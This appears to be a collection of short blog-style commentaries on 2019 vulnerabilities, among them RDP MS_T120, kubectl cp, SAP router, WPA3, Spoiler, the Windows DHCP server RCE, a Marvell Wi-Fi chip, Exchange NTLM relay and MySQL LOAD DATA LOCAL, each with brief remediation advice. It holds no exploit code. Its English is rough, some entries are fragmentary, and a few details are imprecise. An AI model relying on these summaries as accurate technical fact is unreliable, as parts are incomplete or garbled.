Vulnerability Note VU#576688
Original Release Date: 2019-06-04 | Last Revised: 2019-06-04
Preface: The more the power you have, the greater the risk is being infected.
Synopsis: Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.
My observation: Observing that Microsoft re-engineering the RDP with create a channel with MS_T120 and Index 31. But vulnerability occurs when someone send data to the system’s MS_T120 channel and reference the closed channel again.
Interim remediation step:
RDP is disabled if not needed.
SIEM firing rule – client requests with “MST-T120′ on any channel other than 31
Preface: Patch management is the best practice of upgrading existing software applications to remove any weak security patches that could be exploited by hackers.
Background: PrinterLogic’s printer and driver management platform reduces infrastructure costs by eliminating print servers and providing centralized management of every printer on the network. Sold in both on-premise and cloud configurations, PrinterLogic also offers secure pull printing, mobile printing, and improved performance in virtual desktop (VDI) environments.
Preface: Some supercomputers in the world, they are also using Kubernetes.
Technical background: kubectl controls the Kubernetes cluster manager.Make use of “kubectl cp” command is able to copy files and directories to and from containers.
Vulnerability details: An attacker can fool a user to use the kubectl cp command to copy and store a malicious tar file in a container. Successful exploitation may allow an attacker to overwrite or delete any file in the user’s security context.
Comment: This vulnerability looks has difficulties to compromise the system. However the level of risk depends on the feature of the docker services. So do not contempt the issue because it is hard to predict the level of risk.
Preface: Heard that estimated total of 1,000,000 SAP production systems could currently be at risk of being hacked.
Technical details: When you configure sap router (saprouter) to allow remote (from the Internet) connections via the SAP GUI. The original design will add entries to the route tables for TCP port 3300, 3301, and 3303 the external application they are using (a gateway connection on these ports).
Default TCP gateway port exploit by hacker: Since a default pathway built, so the hacker might have a channel to compromise the system. For example, send the malicious code try to conduct remote code execution. As a matter of fact, a proof of concept shown that SAP backend response with malicious code.
Remedy: If you outsource your cyber security watch guard responsibility to managed security services provider. They will create the yara rules to deny such malicious activities. If not, you are require to create yara rules by yourself on IDS system. For more details, please refer to diagram.
Preface: WPA3 protocol aim to enhance Wi-Fi security protection. Yes, it does. But something wrong with him this time.
Technology Synopsis: The very damaging DoS attack consists of clogging one peer with bogus requests with forged source IP addresses. Due to computationally intensive nature of modular exponentiation, the DH key exchange is highly vulnerable to clogging (DoS) attack.The SAE handshake of WPA3 also uses a cookie exchange procedure to mitigate clogging attacks.
The SAE handshake of WPA3 uses a cookie exchange procedure to mitigate clogging attacks.
But the design of the cookie exchange mechanism has technical limitation. Since everyone will receive the (supposedly secret) cookies.
An attacker with a rogue access point can force the client connecting to it to use WPA2’s 4-way handshake and, consequently, to get enough information to launch an offline dictionary attack.
Preface: So called Spoilter, a vulnerability given by Intel CPU design limitation. If hacker successful exploit such vulnerability. They can conduct “Rowhammer” attack for privileges escalation.
Vulnerability detail: The speculative execution function of Intel’s processors aim to increase the performance of a CPU. Meanwhile it caused Intel CPU vulnerability issues in the past. A new found technique is able to determine how virtual and physical memory is related to each other. By discovering time differences, an attacker can determine the memory layout and then know which area to attack. For more details, please refer attached diagram for reference.
Remedy: There is no mitigation plan that can completely erase this problem.
Conclusion: Perhaps “rowhammer” is hard to detect.. Be remind that a predictive defense solution will be reduce the risk. For example you have 360 degree cyber protection includes spam and DNS filter, SIEM, malware protection and managed security services. The impact cause by this vulnerabilities will be under control.
Preface: This vulnerability is included in MS Patch Tue this week. However the vulnerability is more critical than others. Since threat actor can be conduct a remote code execution through social engineering.
Technical highlight: The official announcement told that attacker could exploit the vulnerability by sending a DHCP packet that submits malicious input to the affected software because a design weakness occurs in software (DHCP server) which has a flaw of handles objects in memory. A successful exploit could allow the attacker to execute arbitrary code and compromise the system completely.
My observation: We did not found additional details of this vulnerability. My speculation is that whether windows 2008 DHCP server has non page memory leak flaw which causes this problem. What do you think?
Official remediation: CVE-2019-0626 | Windows DHCP Server Remote Code Execution Vulnerability
Preface: The Marvell 88W8897A SoC (System on a Chip) is the industry’s first 802.11ac chip to combine Bluetooth 4.2, mobile MIMO (Multi-input Multi-output), transmit beamforming, and with built-in support for all screen projection technologies.
Technology Background: Computer design primary focus on memory usage. Even though without an exception in SoC (System on a Chip) design.
Vulnerability found: During Wi-Fi network scans, an overflow condition can be triggered, overwriting certain block pool data structures.
Exploitation of vulnerability: Attacker can exploit ThreadX block pool overflow vulnerability to intercept network traffic or achieve code execution on the host system.
Remedy: Marvell encourages customer to contact their Marvell representative for additional support.
Remark: This vulnerability was post on headline news on mid of January 2019. However we could not found any positive responses announce by vendor.
Preface: EWS Push Subscription, you will get notifications as long as you respond to the server and acknowledge that you received the notification.
The CERT Coordination Center (CERT/CC) announcement – 29th Jan 2019: Microsoft Exchange 2013 and newer are vulnerable to NTLM relay attacks
Vulnerability detail: Exchange allows any user to specify a desired URL for Push Subscription, and the server will attempt to send notifications to this URL….. For more detail, please refer to attached diagram for reference.
Disable EWS push/pull subscriptions.
Remove privileges that Exchange has on the domain object.
Preface: Some organizations that use MySQL include GitHub, US Navy, NASA, Tesla, Netflix, WeChat, Facebook, Zendesk, Twitter, Zappos, YouTube,…etc
Background: Technology writer Ionut Ilascu alert that there is command in MySQL server could be use for steal the personal and web server data without a high level evasion technique.
Technical overview: Security Issues with LOAD DATA LOCAL on MySQL DB server side: Such a server could access any file on the client host to which the client user has read access.
Security Issues with LOAD DATA LOCAL on web server side:
In a Web environment where the clients are connecting from a Web server, a user could use LOAD DATA LOCAL to read any files that the Web server process has read access to.